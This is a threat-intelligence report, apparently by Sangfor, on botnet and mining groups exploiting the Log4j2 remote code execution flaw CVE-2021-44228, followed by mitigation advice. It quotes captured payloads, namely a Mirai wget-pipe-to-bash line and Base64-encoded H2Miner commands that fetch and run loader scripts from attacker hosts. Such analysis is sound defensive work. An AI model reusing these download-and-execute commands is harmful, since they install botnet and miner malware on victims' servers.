Log4j2 RCE黑产从业者的狂欢? - 嘶吼 RoarTalk – 网络安全行业综合服务平台,4hou.com

Log4j2 RCE黑产从业者的狂欢?

千里目安全实验室 话题 2021-12-13 17:07:44
512027
收藏

导语:近日,Apache Log4j2被爆出远程代码执行高危漏洞(CVE-2021-44228),由于该模块被广泛应用在中间件、开发框架、web应用中,涉及用户群体大,并且漏洞危害性高,导致漏洞影响力巨大,几乎波及各行各业。

1.概述

近日,Apache Log4j2被爆出远程代码执行高危漏洞(CVE-2021-44228),由于该模块被广泛应用在中间件、开发框架、web应用中,涉及用户群体大,并且漏洞危害性高,导致漏洞影响力巨大,几乎波及各行各业。

通过深信服云端数据监控,具有漏洞利用攻击行为的数量爆发式增长,同时日志分析过程中发现多个黑产组织已将此漏洞利用融入了自身武器库,预计未来一段时间内利用该漏洞的攻击事件仍会持续增加。如下是云端近期拦截的攻击日志趋势:

1.png 

行业分布上,企业、教育、政府、医疗卫生等行业更易受到该漏洞利用攻击的影响。被攻击的行业分布如下:

2.png 

 

2.漏洞简介

漏洞名称 : Apache Log4j2远程代码执行漏洞

漏洞描述:Apache Log4j2远程代码执行漏洞漏洞是由于Apache Log4j2某些功能存在递归解析功能,攻击者可利用该漏洞在未授权的情况下,构造恶意数据进行远程代码执行攻击,最终获取服务器最高权限。

组件名称 : Apache Log4j2

影响范围:

2.0.0  ≤  Apache Log4j2  ≤  2.15.0-rc1

漏洞类型 : 远程代码执行

 

利用条件 :

1、用户认证:不需要用户认证

2、前置条件:默认配置

3、触发方式:远程

 

利用难度:容易,无需授权即可远程代码执行。

威胁等级:严重,能造成远程代码执行。

 

详细查阅:https://mp.weixin.qq.com/s/40vKowBxaf6XRAkR8Hdd9w

 

3.云端事件监测

截至目前,深信服威胁情报团队监测到多起Apache Log4j2远程代码执行漏洞(CVE-2021-44228)利用事件,我们发现该漏洞已被多个黑产组织武器化,添加到自身的武器库中以发起网络攻击,目前捕获到H2Miner、Mirai、Muhstik、Z0Miner等病毒家族都已使用此漏洞进行攻击。

Apache Log4j2漏洞披露及黑产武器化时间线如图:

3.png 

Mirai攻击事件

捕获到的Mirai僵尸网络使用Log4j2(CVE-2021-44228)漏洞的攻击payload如下:

4.png 

payload经Base64解密后,内容如下:
wget -q -O- http://62.210.130.xxx/lh.sh|bash

经分析,lh.sh脚本为前置载荷,会下载执行Mirai的可执行文件,脚本文件内容如下:

8.png 

Mirai僵尸网络整体攻击流程如下:

 6.png

H2Miner攻击事件

捕获到的H2Miner挖矿木马使用Log4j2(CVE-2021-44228)漏洞的攻击payload如下:

80.71.158.xxx:5558/Basic/Command/Base64/KGN1cmwgLXMgODAuNzEuMTU4LjEyL21tbS5zaHx8d2dldCAtcSAtTy0gODAuNzEuMTU4LjEyL21tbS5zaCl8YmFzaA==

82.118.18.xxx:1534/Basic/Command/Base64/KGN1cmwgLXMgODIuMTE4LjE4LjIwMS9saC5zaHx8d2dldCAtcSAtTy0gODIuMTE4LjE4LjIwMS9saC5zaCl8YmFzaA==

92.242.40.xxx:5557/Basic/Command/Base64/KGN1cmwgLXMgOTIuMjQyLjQwLjIxL2xoLnNofHx3Z2V0IC1xIC1PLSA5Mi4yNDIuNDAuMjEvbGguc2gpfGJhc2g=

92.242.40.xxx:5557/Basic/Command/Base64/KGN1cmwgLXMgOTIuMjQyLjQwLjIxL2xoMi5zaHx8d2dldCAtcSAtTy0gOTIuMjQyLjQwLjIxL2xoMi5zaCl8c2g=

payload经Base64解密后,内容如下:

 7.png

经分析,lh.sh/lh2.sh/mmm.sh均为H2Miner的前置加载脚本,负责下载执行后续挖矿和后门模块,脚本文件内容如下:

 8.png

H2Miner挖矿木马整体攻击流程如下:

 9.png

Muhstik攻击事件

捕获到的Muhstik僵尸网络使用Log4j2(CVE-2021-44228)漏洞的攻击payload内容如下:

10.png 

Exploit.class负责下载执行前置脚本log,经反编译内容如下:

11.png 

前置脚本log负责下载后续其他恶意载荷,脚本内容如下:

12.png 

Muhstik僵尸网络整体攻击流程如下:

13.png 

Z0miner攻击事件

捕获到的Z0miner挖矿木马使用Log4j2(CVE-2021-44228)漏洞的攻击payload内容如下:

14.png 

payload经Base64解密后,内容如下:

12.png 

4.总结

 漏洞是黑产发起攻击的重要手段,尤其是0day或Nday漏洞已经成为僵尸网络的常用套路,僵尸网络为了更有效和广泛的传播,会在漏洞被披露的第一时间更新进武器库。在本次漏洞事件中,Apache Log4j2漏洞因影响范围巨大、利用门槛极低,不仅H2Miner、Muhstik、Mirai、Z0Miner已开始使用此漏洞,可以预见的是,未来还会有更多的攻击组织将其加入武器库进行网络攻击。

另外,CVE、补丁和漏洞利用三者之间的时间间隔值得关注。Apache Log4j2被爆出远程代码执行高危漏洞,大多数的安全厂商开始开发他们的漏洞签名和保护策略,同时大多数的攻击者也开始尝试利用这个漏洞。在这段攻击人员与防护人员之间的博弈敏感期,谁能更快地作出响应,谁就能更好地占据先机。

5.处置建议

升级到最新版本:

当前官方已发布最新版本,建议受影响的用户及时更新升级到最新版本。链接如下:

https://github.com/apache/logging-log4j2/releases/tag/log4j-2.15.0-rc2

 

临时缓解措施:

(1)在项目启动程序中添加System.setProperty("log4j2.formatMsgNoLookups", "true");

(2)直接添加jvm启动参数:Dlog4j2.formatMsgNoLookups=true;

(3)在应用程序的classpath下添加log4j2.component.properties配置文件(文件名自定义),文件内容:log4j2.formatMsgNoLookups=True。

 

如若转载,请注明原文地址
  • 分享至
取消

感谢您的支持,我会继续努力的!

扫码支持

打开微信扫一扫后点击右上角即可分享哟

发表评论

 
本站4hou.com,所使用的字体和图片文字等素材部分来源于原作者或互联网共享平台。如使用任何字体和图片文字有侵犯其版权所有方的,嘶吼将配合联系原作者核实,并做出删除处理。
©2022 北京嘶吼文化传媒有限公司 京ICP备16063439号-1 本站由 提供云计算服务